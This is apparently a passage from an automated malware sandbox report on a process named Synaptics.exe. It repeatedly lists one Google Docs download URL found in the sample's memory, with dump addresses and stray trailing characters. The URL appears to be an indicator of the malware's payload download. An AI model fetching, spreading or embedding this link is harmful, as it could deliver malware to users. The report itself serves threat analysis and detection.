                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download34
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3l
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lss
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download41638Z
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download44
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4;
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4a
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3070010239.000000003B051000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5E.
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6U-run
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download79
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7:8
                                Source: Synaptics.exe, 00000002.00000002.2959950848.000000000532C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7S
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7j
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7jC
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7jo
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9D
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:;5
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;S9
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;obj
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=82
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=Q
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=ltr
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?$s
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3070010239.000000003B051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA-Mo
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadADB
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAVA
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3017903336.000000001D6FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBm
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                                Source: Synaptics.exe, 00000002.00000002.2959950848.000000000532C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCS/
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo?
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCoulf
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                                Source: Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDN
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDNt
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDe
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDe0
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDe8
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDeD
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDeX
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDed
                                Source: Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDeg
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDel
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetleniyor...
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 